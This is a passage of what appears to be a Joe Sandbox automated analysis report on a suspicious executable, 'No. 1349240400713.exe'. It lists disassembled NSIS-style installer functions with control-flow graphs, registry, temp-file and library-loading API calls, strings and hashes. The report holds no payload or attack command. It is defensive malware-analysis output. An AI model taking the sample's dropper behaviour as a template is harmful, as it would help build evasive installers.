                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                • Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                • Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8
                                                                Function 00405F36 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 999 405f36-405f42 1000 405f43-405f77 GetTickCount GetTempFileNameW 999->1000 1001 405f86-405f88 1000->1001 1002 405f79-405f7b 1000->1002 1004 405f80-405f83 1001->1004 1002->1000 1003 405f7d 1002->1003 1003->1004
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405F54
                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\No. 1349240400713.exe",004034C3,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F), ref: 00405F6F
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F3B
                                                                • "C:\Users\user\Desktop\No. 1349240400713.exe", xrefs: 00405F36
                                                                • nsa, xrefs: 00405F43
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-2709636838
                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                • Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                • Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58
                                                                Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1005 402e41-402e6a call 40627e 1007 402e6f-402e73 1005->1007 1008 402f24-402f28 1007->1008 1009 402e79-402e7d 1007->1009 1010 402ea2-402eb5 1009->1010 1011 402e7f-402ea0 RegEnumValueW 1009->1011 1013 402ede-402ee5 RegEnumKeyW 1010->1013 1011->1010 1012 402f09-402f17 RegCloseKey 1011->1012 1012->1008 1014 402eb7-402eb9 1013->1014 1015 402ee7-402ef9 RegCloseKey call 406806 1013->1015 1014->1012 1016 402ebb-402ecf call 402e41 1014->1016 1021 402f19-402f1f 1015->1021 1022 402efb-402f07 RegDeleteKeyW 1015->1022 1016->1015 1023 402ed1-402edd 1016->1023 1021->1008 1022->1008 1023->1013
                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseEnum$DeleteValue
                                                                • String ID:
                                                                • API String ID: 1354259210-0
                                                                • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                • Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
                                                                • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                • Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8
                                                                Function 6EDF1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1024 6edf1777-6edf17b6 call 6edf1b5f 1028 6edf17bc-6edf17c0 1024->1028 1029 6edf18d6-6edf18d8 1024->1029 1030 6edf17c9-6edf17d6 call 6edf23e0 1028->1030 1031 6edf17c2-6edf17c8 call 6edf239e 1028->1031 1036 6edf17d8-6edf17dd 1030->1036 1037 6edf1806-6edf180d 1030->1037 1031->1030 1040 6edf17df-6edf17e0 1036->1040 1041 6edf17f8-6edf17fb 1036->1041 1038 6edf180f-6edf182b call 6edf25b5 call 6edf15b4 call 6edf1272 GlobalFree 1037->1038 1039 6edf182d-6edf1831 1037->1039 1062 6edf1885-6edf1889 1038->1062 1045 6edf187e-6edf1884 call 6edf25b5 1039->1045 1046 6edf1833-6edf187c call 6edf15c6 call 6edf25b5 1039->1046 1043 6edf17e8-6edf17e9 call 6edf2af8 1040->1043 1044 6edf17e2-6edf17e3 1040->1044 1041->1037 1047 6edf17fd-6edf17fe call 6edf2d83 1041->1047 1058 6edf17ee 1043->1058 1051 6edf17e5-6edf17e6 1044->1051 1052 6edf17f0-6edf17f6 call 6edf2770 1044->1052 1045->1062 1046->1062 1055 6edf1803 1047->1055 1051->1037 1051->1043 1061 6edf1805 1052->1061 1055->1061 1058->1055 1061->1037 1067 6edf188b-6edf1899 call 6edf2578 1062->1067 1068 6edf18c6-6edf18cd 1062->1068 1074 6edf189b-6edf189e 1067->1074 1075 6edf18b1-6edf18b8 1067->1075 1068->1029 1070 6edf18cf-6edf18d0 GlobalFree 1068->1070 1070->1029 1074->1075 1076 6edf18a0-6edf18a8 1074->1076 1075->1068 1077 6edf18ba-6edf18c5 call 6edf153d 1075->1077 1076->1075 1078 6edf18aa-6edf18ab FreeLibrary 1076->1078 1077->1068 1078->1075
                                                                APIs
                                                                  • Part of subcall function 6EDF1B5F: GlobalFree.KERNEL32(?), ref: 6EDF1DD4
                                                                  • Part of subcall function 6EDF1B5F: GlobalFree.KERNEL32(?), ref: 6EDF1DD9
                                                                  • Part of subcall function 6EDF1B5F: GlobalFree.KERNEL32(?), ref: 6EDF1DDE
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF1825
                                                                • FreeLibrary.KERNEL32(?), ref: 6EDF18AB
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF18D0
                                                                  • Part of subcall function 6EDF239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6EDF23CF
                                                                  • Part of subcall function 6EDF2770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EDF17F6,00000000), ref: 6EDF2840
                                                                  • Part of subcall function 6EDF15C6: wsprintfW.USER32 ref: 6EDF15F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                • String ID:
                                                                • API String ID: 3962662361-3916222277
                                                                • Opcode ID: 09bb64628ad75d02eacf49d1e4c62191ddecceea94be6ea9924ceea450e578f2
                                                                • Instruction ID: 1420259387a9025f07e5f4a2cdfb13ead005de5b56bbceb1d5d3fe1640ccec79
                                                                • Opcode Fuzzy Hash: 09bb64628ad75d02eacf49d1e4c62191ddecceea94be6ea9924ceea450e578f2
                                                                • Instruction Fuzzy Hash: 6441A0B1800246EADB00DFF4A994BC537ACBF05319F0649A5E95A9E187DB74C58F87B0
                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1081 401c43-401c63 call 402d1c * 2 1086 401c65-401c6c call 402d3e 1081->1086 1087 401c6f-401c73 1081->1087 1086->1087 1088 401c75-401c7c call 402d3e 1087->1088 1089 401c7f-401c85 1087->1089 1088->1089 1092 401cd3-401cfd call 402d3e * 2 FindWindowExW 1089->1092 1093 401c87-401ca3 call 402d1c * 2 1089->1093 1104 401d03 1092->1104 1105 401cc3-401cd1 SendMessageW 1093->1105 1106 401ca5-401cc1 SendMessageTimeoutW 1093->1106 1107 401d06-401d09 1104->1107 1105->1104 1106->1107 1108 402bc2-402bd1 1107->1108 1109 401d0f 1107->1109 1109->1108
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                • Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
                                                                • Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                • Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp,00000023,00000011,00000002), ref: 004024CD
                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp,00000000,00000011,00000002), ref: 0040250D
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseValuelstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp
                                                                • API String ID: 2655323295-2491664880
                                                                • Opcode ID: 9e720649662cdc413bd8d4d136e207e08986e5d50d4fc5c41021c63d7149cc75
                                                                • Instruction ID: 7edbd774ff12736b5c68cca40ff53a8b2e2340a941a441eef078c8e93cf21856
                                                                • Opcode Fuzzy Hash: 9e720649662cdc413bd8d4d136e207e08986e5d50d4fc5c41021c63d7149cc75
                                                                • Instruction Fuzzy Hash: 1C11AF71E00108BEDB00AFA5CE49AAEBBB8EF44314F20443AF504B71D1D7B89D409A68
                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(?,?,bismers\Phytotomist54.off,?,00405E05,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                  • Part of subcall function 00405948: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040598B
                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\udstrmningsdysernes\eir\Speckly,?,00000000,000000F0), ref: 0040164D
                                                                Strings
                                                                • C:\Users\user\udstrmningsdysernes\eir\Speckly, xrefs: 00401640
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\udstrmningsdysernes\eir\Speckly
                                                                • API String ID: 1892508949-849927899
                                                                • Opcode ID: 8bd5528b3ed13611c2729177aa216aa5dfd0a4f92ec19a6671f3c1d709377d7f
                                                                • Instruction ID: d42e9ae115e382ed64a017e661d14a8570f8e1ce7a364987760287960e16c3b9
                                                                • Opcode Fuzzy Hash: 8bd5528b3ed13611c2729177aa216aa5dfd0a4f92ec19a6671f3c1d709377d7f
                                                                • Instruction Fuzzy Hash: B411DD31504110EBCF206FA5CD4199F3BB0EF25369B28493BEA51B22F1DA3E49819A5E
                                                                Function 004053ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040541C
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040546D
                                                                  • Part of subcall function 004043B3: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004043C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                • Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
                                                                • Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                • Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E
                                                                Function 004062DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C248,00000000,?,?,Call,?,?,0040656E,80000002), ref: 00406325
                                                                • RegCloseKey.KERNELBASE(?,?,0040656E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C248), ref: 00406330
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: Call
                                                                • API String ID: 3356406503-1824292864
                                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction ID: 844154995e22508991f9c2085a3ddc533437a0a8a5a4e2329c4a16b7f523fd8f
                                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction Fuzzy Hash: CF017172500209EBDF218F55CD05EDB3BA9EB54394F05803AFD5592150E738D964DBA4
                                                                Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                  • Part of subcall function 00405479: lstrcatW.KERNEL32(0042C248,004033B0,004033B0,0042C248,00000000,00425A20,771B23A0), ref: 004054D4
                                                                  • Part of subcall function 00405479: SetWindowTextW.USER32(0042C248,0042C248), ref: 004054E6
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 334405425-0
                                                                • Opcode ID: 78ecc952e10d997ac4934020b2af859247c5bfa8e95875e99b3b14e24fd3f8e7
                                                                • Instruction ID: ec066b6349dd7fa10fed5d852794e64c7c96c86c32cb5d354c2886168094fa20
                                                                • Opcode Fuzzy Hash: 78ecc952e10d997ac4934020b2af859247c5bfa8e95875e99b3b14e24fd3f8e7
                                                                • Instruction Fuzzy Hash: A7219931500104EBCF10AFA5CE49A9E7A71AF44354F34413BF515B51E0CBBD9D829A1D
                                                                Function 00402596 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
